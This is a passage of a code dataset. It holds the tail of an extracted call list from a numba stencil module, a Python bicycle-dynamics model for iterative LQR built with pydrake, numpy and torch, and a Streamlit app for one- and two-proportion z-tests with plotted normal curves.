'numpy.isfinite', 'np.isfinite', ({(587, 31, 587, 35): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((589, 19, 589, 33), 'numpy.isnan', 'np.isnan', ({(589, 28, 589, 32): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((620, 26, 620, 52), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(620, 47, 620, 51): 'cval'}, {}), '(cval)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((680, 37, 680, 65), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(680, 60, 680, 64): 'name'}, {}), '(name)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((777, 47, 777, 79), 'numba.np.numpy_support.map_layout', 'numpy_support.map_layout', ({(777, 72, 777, 78): 'result'}, {}), '(result)', False, 'from numba.np import numpy_support\n'), ((332, 26, 333, 77), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(333, 24, 333, 76): '"""Stencil index does not match array dimensionality."""'}, {}), "('Stencil index does not match array dimensionality.')", False, 'from numba.core.errors import NumbaValueError\n'), ((591, 21, 591, 35), 'numpy.isinf', 'np.isinf', ({(591, 30, 591, 34): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((603, 31, 604, 49), 'numba.np.numpy_support.as_dtype', 'numpy_support.as_dtype', ({(604, 31, 604, 48): 'return_type.dtype'}, {}), '(return_type.dtype)', False, 'from numba.np import numpy_support\n'), ((607, 40, 607, 66), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(607, 61, 607, 65): 'cval'}, {}), '(cval)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((609, 26, 609, 46), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(609, 42, 609, 45): 'msg'}, {}), '(msg)', False, 'from numba.core.errors import NumbaValueError\n'), ((623, 26, 623, 46), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(623, 42, 623, 45): 'msg'}, {}), '(msg)', False, 'from numba.core.errors import NumbaValueError\n'), ((712, 33, 712, 53), 'numba.core.ir.Block', 'ir.Block', ({(712, 42, 712, 47): 'scope', (712, 49, 712, 52): 'loc'}, {}), '(scope, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((778, 33, 778, 56), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(778, 54, 778, 55): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((783, 33, 783, 56), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(783, 54, 783, 55): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((107, 31, 107, 59), 'numba.core.ir.Var', 'ir.Var', ({(107, 38, 107, 43): 'scope', (107, 45, 107, 53): 'out_name', (107, 55, 107, 58): 'loc'}, {}), '(scope, out_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((108, 31, 108, 64), 'numba.core.ir.Var', 'ir.Var', ({(108, 38, 108, 43): 'scope', (108, 45, 108, 58): 'index_vars[0]', (108, 60, 108, 63): 'loc'}, {}), '(scope, index_vars[0], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((118, 39, 118, 78), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(118, 62, 118, 77): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((119, 39, 119, 71), 'numba.core.ir.Var', 'ir.Var', ({(119, 46, 119, 51): 'scope', (119, 53, 119, 65): 's_index_name', (119, 67, 119, 70): 'loc'}, {}), '(scope, s_index_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((121, 37, 121, 77), 'numba.core.ir.Expr.build_tuple', 'ir.Expr.build_tuple', ({(121, 57, 121, 71): 'var_index_vars', (121, 73, 121, 76): 'loc'}, {}), '(var_index_vars, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((123, 31, 123, 59), 'numba.core.ir.Var', 'ir.Var', ({(123, 38, 123, 43): 'scope', (123, 45, 123, 53): 'out_name', (123, 55, 123, 58): 'loc'}, {}), '(scope, out_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((126, 29, 126, 75), 'numba.core.ir.SetItem', 'ir.SetItem', ({(126, 40, 126, 44): 'rvar', (126, 46, 126, 57): 's_index_var', (126, 59, 126, 69): 'stmt.value', (126, 71, 126, 74): 'loc'}, {}), '(rvar, s_index_var, stmt.value, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((212, 36, 212, 70), 'numba.core.ir.Var', 'ir.Var', ({(212, 43, 212, 48): 'scope', (212, 50, 212, 64): 'index_names[0]', (212, 66, 212, 69): 'loc'}, {}), '(scope, index_names[0], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((213, 34, 213, 73), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(213, 57, 213, 72): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((214, 34, 214, 61), 'numba.core.ir.Var', 'ir.Var', ({(214, 41, 214, 46): 'scope', (214, 48, 214, 55): 'tmpname', (214, 57, 214, 60): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((242, 39, 242, 78), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(242, 62, 242, 77): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((243, 39, 243, 71), 'numba.core.ir.Var', 'ir.Var', ({(243, 46, 243, 51): 'scope', (243, 53, 243, 65): 's_index_name', (243, 67, 243, 70): 'loc'}, {}), '(scope, s_index_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((293, 37, 293, 75), 'numba.core.ir.Expr.build_tuple', 'ir.Expr.build_tuple', ({(293, 57, 293, 69): 'ind_stencils', (293, 71, 293, 74): 'loc'}, {}), '(ind_stencils, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((329, 26, 330, 74), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(330, 24, 330, 73): '"""Non-tuple or non-integer used as stencil index."""'}, {}), "('Non-tuple or non-integer used as stencil index.')", False, 'from numba.core.errors import NumbaValueError\n'), ((721, 38, 721, 68), 'numba.core.ir.Jump', 'ir.Jump', ({(721, 46, 721, 62): 'body_first_label', (721, 64, 721, 67): 'loc'}, {}), '(body_first_label, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((779, 38, 779, 61), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(779, 59, 779, 60): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((109, 40, 109, 79), 'numba.core.ir.SetItem', 'ir.SetItem', ({(109, 51, 109, 55): 'rvar', (109, 57, 109, 61): 'ivar', (109, 63, 109, 73): 'stmt.value', (109, 75, 109, 78): 'loc'}, {}), '(rvar, ivar, stmt.value, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((115, 40, 115, 67), 'numba.core.ir.Var', 'ir.Var', ({(115, 47, 115, 52): 'scope', (115, 54, 115, 61): 'one_var', (115, 63, 115, 66): 'loc'}, {}), '(scope, one_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((122, 40, 122, 79), 'numba.core.ir.Assign', 'ir.Assign', ({(122, 50, 122, 60): 'tuple_call', (122, 62, 122, 73): 's_index_var', (122, 75, 122, 78): 'loc'}, {}), '(tuple_call, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((221, 38, 221, 64), 'numba.njit', 'numba.njit', ({(221, 49, 221, 63): 'slice_addition'}, {}), '(slice_addition)', False, 'import numba\n'), ((222, 42, 222, 77), 'numba.core.types.functions.Dispatcher', 'types.functions.Dispatcher', ({(222, 69, 222, 76): 'sa_func'}, {}), '(sa_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((224, 35, 224, 76), 'numba.core.ir.Global', 'ir.Global', ({(224, 45, 224, 61): '"""slice_addition"""', (224, 63, 224, 70): 'sa_func', (224, 72, 224, 75): 'loc'}, {}), "('slice_addition', sa_func, loc)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((226, 50, 226, 108), 'numba.core.ir.Expr.call', 'ir.Expr.call', ({(226, 63, 226, 69): 'sa_var', (226, 71, 226, 98): '[stmt_index_var, index_var]', (226, 100, 226, 102): '()', (226, 104, 226, 107): 'loc'}, {}), '(sa_var, [stmt_index_var, index_var], (), loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((233, 39, 234, 68), 'numba.core.ir.Expr.binop', 'ir.Expr.binop', ({(233, 53, 233, 65): 'operator.add', (233, 67, 233, 81): 'stmt_index_var', (234, 53, 234, 62): 'index_var', (234, 64, 234, 67): 'loc'}, {}), '(operator.add, stmt_index_var, index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((254, 38, 254, 75), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(254, 61, 254, 74): '"""const_index"""'}, {}), "('const_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((255, 38, 255, 65), 'numba.core.ir.Var', 'ir.Var', ({(255, 45, 255, 50): 'scope', (255, 52, 255, 59): 'tmpname', (255, 61, 255, 64): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((259, 40, 259, 76), 'numba.core.ir.Var', 'ir.Var', ({(259, 47, 259, 52): 'scope', (259, 54, 259, 70): 'index_names[dim]', (259, 72, 259, 75): 'loc'}, {}), '(scope, index_names[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((262, 38, 262, 81), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(262, 61, 262, 80): '"""ind_stencil_index"""'}, {}), "('ind_stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((263, 38, 263, 65), 'numba.core.ir.Var', 'ir.Var', ({(263, 45, 263, 50): 'scope', (263, 52, 263, 59): 'tmpname', (263, 61, 263, 64): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((265, 42, 265, 75), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(265, 65, 265, 74): '"""getitem"""'}, {}), "('getitem')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((266, 42, 266, 73), 'numba.core.ir.Var', 'ir.Var', ({(266, 49, 266, 54): 'scope', (266, 56, 266, 67): 'getitemname', (266, 69, 266, 72): 'loc'}, {}), '(scope, getitemname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((267, 42, 268, 82), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(267, 58, 267, 72): 'stmt_index_var', (268, 55, 268, 76): 'const_index_vars[dim]', (268, 78, 268, 81): 'loc'}, {}), '(stmt_index_var, const_index_vars[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((294, 40, 294, 79), 'numba.core.ir.Assign', 'ir.Assign', ({(294, 50, 294, 60): 'tuple_call', (294, 62, 294, 73): 's_index_var', (294, 75, 294, 78): 'loc'}, {}), '(tuple_call, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((320, 34, 322, 65), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(321, 32, 322, 64): '"""stencil kernel index is not constant,\'neighborhood\' option required"""'}, {}), '(\n "stencil kernel index is not constant,\'neighborhood\' option required")', False, 'from numba.core.errors import NumbaValueError\n'), ((734, 28, 734, 51), 'numba.core.ir.Jump', 'ir.Jump', ({(734, 36, 734, 45): 'new_label', (734, 47, 734, 50): 'loc'}, {}), '(new_label, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((204, 34, 205, 75), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(204, 50, 205, 74): '"""stencil kernel index is not constant, \'neighborhood\' option required"""'}, {}), '(\n "stencil kernel index is not constant, \'neighborhood\' option required")', False, 'from numba.core.errors import NumbaValueError\n'), ((220, 51, 220, 91), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(220, 74, 220, 90): '"""slice_addition"""'}, {}), "('slice_addition')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((225, 44, 225, 72), 'numba.core.ir.Assign', 'ir.Assign', ({(225, 54, 225, 58): 'g_sa', (225, 60, 225, 66): 'sa_var', (225, 68, 225, 71): 'loc'}, {}), '(g_sa, sa_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((228, 44, 228, 87), 'numba.core.ir.Assign', 'ir.Assign', ({(228, 54, 228, 73): 'slice_addition_call', (228, 75, 228, 81): 'tmpvar', (228, 83, 228, 86): 'loc'}, {}), '(slice_addition_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((235, 44, 235, 76), 'numba.core.ir.Assign', 'ir.Assign', ({(235, 54, 235, 62): 'acc_call', (235, 64, 235, 70): 'tmpvar', (235, 72, 235, 75): 'loc'}, {}), '(acc_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((269, 44, 269, 83), 'numba.core.ir.Assign', 'ir.Assign', ({(269, 54, 269, 65): 'getitemcall', (269, 67, 269, 77): 'getitemvar', (269, 79, 269, 82): 'loc'}, {}), '(getitemcall, getitemvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((280, 42, 280, 68), 'numba.njit', 'numba.njit', ({(280, 53, 280, 67): 'slice_addition'}, {}), '(slice_addition)', False, 'import numba\n'), ((281, 46, 281, 81), 'numba.core.types.functions.Dispatcher', 'types.functions.Dispatcher', ({(281, 73, 281, 80): 'sa_func'}, {}), '(sa_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((283, 39, 283, 80), 'numba.core.ir.Global', 'ir.Global', ({(283, 49, 283, 65): '"""slice_addition"""', (283, 67, 283, 74): 'sa_func', (283, 76, 283, 79): 'loc'}, {}), "('slice_addition', sa_func, loc)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((285, 54, 285, 114), 'numba.core.ir.Expr.call', 'ir.Expr.call', ({(285, 67, 285, 73): 'sa_var', (285, 75, 285, 104): '[getitemvar, index_vars[dim]]', (285, 106, 285, 108): '()', (285, 110, 285, 113): 'loc'}, {}), '(sa_var, [getitemvar, index_vars[dim]], (), loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((289, 43, 290, 78), 'numba.core.ir.Expr.binop', 'ir.Expr.binop', ({(289, 57, 289, 69): 'operator.add', (289, 71, 289, 81): 'getitemvar', (290, 57, 290, 72): 'index_vars[dim]', (290, 74, 290, 77): 'loc'}, {}), '(operator.add, getitemvar, index_vars[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((296, 34, 296, 83), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(296, 50, 296, 66): 'stmt.value.value', (296, 67, 296, 78): 's_index_var', (296, 79, 296, 82): 'loc'}, {}), '(stmt.value.value, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((230, 43, 230, 89), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(230, 59, 230, 75): 'stmt.value.value', (230, 77, 230, 83): 'tmpvar', (230, 85, 230, 88): 'loc'}, {}), '(stmt.value.value, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((237, 43, 237, 89), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(237, 59, 237, 75): 'stmt.value.value', (237, 77, 237, 83): 'tmpvar', (237, 85, 237, 88): 'loc'}, {}), '(stmt.value.value, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((256, 54, 256, 72), 'numba.core.ir.Const', 'ir.Const', ({(256, 63, 256, 66): 'dim', (256, 68, 256, 71): 'loc'}, {}), '(dim, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((279, 55, 279, 95), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(279, 78, 279, 94): '"""slice_addition"""'}, {}), "('slice_addition')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((284, 48, 284, 76), 'numba.core.ir.Assign', 'ir.Assign', ({(284, 58, 284, 62): 'g_sa', (284, 64, 284, 70): 'sa_var', (284, 72, 284, 75): 'loc'}, {}), '(g_sa, sa_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((287, 48, 287, 91), 'numba.core.ir.Assign', 'ir.Assign', ({(287, 58, 287, 77): 'slice_addition_call', (287, 79, 287, 85): 'tmpvar', (287, 87, 287, 90): 'loc'}, {}), '(slice_addition_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((291, 48, 291, 80), 'numba.core.ir.Assign', 'ir.Assign', ({(291, 58, 291, 66): 'acc_call', (291, 68, 291, 74): 'tmpvar', (291, 76, 291, 79): 'loc'}, {}), '(acc_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n')] |
lujieyang/irs_lqr | examples/bicycle/bicycle_dynamics.py | bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f | import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
class BicycleDynamics(DynamicalSystem):
def __init__(self, h):
super().__init__()
"""
x = [x pos, y pos, heading, speed, steering_angle]
u = [acceleration, steering_velocity]
"""
self.h = h
self.dim_x = 5
self.dim_u = 2
"""Jacobian computations"""
self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)])
self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)])
self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym)
self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym)))
def dynamics_sym(self, x, u):
"""
Symbolic expression for dynamics. Used to compute
linearizations of the system.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * ps.cos(heading),
v * ps.sin(heading),
v * ps.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics(self, x, u):
"""
Numeric expression for dynamics.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics_batch(self, x, u):
"""
Batch dynamics. Uses pytorch for
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = np.vstack((
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[:,0],
u[:,1]
)).transpose()
x_new = x + self.h * dxdt
return x_new
def dynamics_batch_torch(self, x, u):
"""
Batch dynamics. Uses pytorch for
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
x = torch.Tensor(x).cuda()
u = torch.Tensor(u).cuda()
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = torch.vstack((
v * torch.cos(heading),
v * torch.sin(heading),
v * torch.tan(steer),
u[:,0],
u[:,1]
)).T
x_new = x + self.h * dxdt
return x_new
def jacobian_xu(self, x, u):
"""
Recoever linearized dynamics dfdx as a function of x, u
"""
env = {self.x_sym[i]: x[i] for i in range(self.dim_x)}
env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)})
f_x = ps.Evaluate(self.jacobian_xu_sym, env)
return f_x
def jacobian_xu_batch(self, x, u):
"""
Recoever linearized dynamics dfd(xu) as a function of x, u
"""
dxdu_batch = np.zeros((
x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))
for i in range(x.shape[0]):
dxdu_batch[i] = self.jacobian_xu(x[i], u[i])
return dxdu_batch
| [((121, 14, 121, 52), 'pydrake.symbolic.Evaluate', 'ps.Evaluate', ({(121, 26, 121, 46): 'self.jacobian_xu_sym', (121, 48, 121, 51): 'env'}, {}), '(self.jacobian_xu_sym, env)', True, 'import pydrake.symbolic as ps\n'), ((128, 21, 129, 61), 'numpy.zeros', 'np.zeros', ({(128, 30, 129, 60): '(x.shape[0], x.shape[1], x.shape[1] + u.shape[1])'}, {}), '((x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))', True, 'import numpy as np\n'), ((24, 55, 24, 90), 'numpy.hstack', 'np.hstack', ({(24, 65, 24, 89): '(self.x_sym, self.u_sym)'}, {}), '((self.x_sym, self.u_sym))', True, 'import numpy as np\n'), ((98, 12, 98, 27), 'torch.Tensor', 'torch.Tensor', ({(98, 25, 98, 26): 'x'}, {}), '(x)', False, 'import torch\n'), ((99, 12, 99, 27), 'torch.Tensor', 'torch.Tensor', ({(99, 25, 99, 26): 'u'}, {}), '(u)', False, 'import torch\n'), ((37, 16, 37, 31), 'pydrake.symbolic.cos', 'ps.cos', ({(37, 23, 37, 30): 'heading'}, {}), '(heading)', True, 'import pydrake.symbolic as ps\n'), ((38, 16, 38, 31), 'pydrake.symbolic.sin', 'ps.sin', ({(38, 23, 38, 30): 'heading'}, {}), '(heading)', True, 'import pydrake.symbolic as ps\n'), ((39, 16, 39, 29), 'pydrake.symbolic.tan', 'ps.tan', ({(39, 23, 39, 28): 'steer'}, {}), '(steer)', True, 'import pydrake.symbolic as ps\n'), ((57, 16, 57, 31), 'numpy.cos', 'np.cos', ({(57, 23, 57, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((58, 16, 58, 31), 'numpy.sin', 'np.sin', ({(58, 23, 58, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((59, 16, 59, 29), 'numpy.tan', 'np.tan', ({(59, 23, 59, 28): 'steer'}, {}), '(steer)', True, 'import numpy as np\n'), ((106, 16, 106, 34), 'torch.cos', 'torch.cos', ({(106, 26, 106, 33): 'heading'}, {}), '(heading)', False, 'import torch\n'), ((107, 16, 107, 34), 'torch.sin', 'torch.sin', ({(107, 26, 107, 33): 'heading'}, {}), '(heading)', False, 'import torch\n'), ((108, 16, 108, 32), 'torch.tan', 'torch.tan', ({(108, 26, 108, 31): 'steer'}, {}), '(steer)', False, 'import torch\n'), ((79, 16, 79, 31), 'numpy.cos', 'np.cos', ({(79, 23, 79, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((80, 16, 80, 31), 'numpy.sin', 'np.sin', ({(80, 23, 80, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((81, 16, 81, 29), 'numpy.tan', 'np.tan', ({(81, 23, 81, 28): 'steer'}, {}), '(steer)', True, 'import numpy as np\n')] |
harmkenn/PST_Deploy_Test | apps/proportions.py | 2484acf13f1f998c98fa94fad98c1f75c27d292b | import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
if prop_choice == "Two Proportions":
c1,c2,c3 = st.columns(3)
with c1:
x1 = int(st.text_input("Hits 1",20))
n1 = int(st.text_input("Tries 1",25))
with c2:
x2 = int(st.text_input("Hits 2",30))
n2 = int(st.text_input("Tries 2",50))
with c3:
alpha = float(st.text_input("Alpha",.05))
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat1 = x1/n1
q_hat1 = 1 -p_hat1
p_hat2 = x2/n2
q_hat2 = 1 - p_hat2
pp_hat = (x1+x2)/(n1+n2)
dp_hat = p_hat1 - p_hat2
pq_hat = 1-pp_hat
tsd = math.sqrt(pp_hat*pq_hat*(1/n1+1/n2))
cise = math.sqrt(p_hat1*q_hat1/n1+p_hat2*q_hat2/n2)
z = (p_hat1 - p_hat2)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat 1":p_hat1,"p-Hat 2":p_hat2,"Pooled p-Hat":pp_hat,"Diff p-Hat":dp_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = dp_hat - abs(me)
upper = dp_hat + abs(me)
st.write(str(100*cl) + "'%' confidence interval is (" + str(lower) +", "+str(upper)+")")
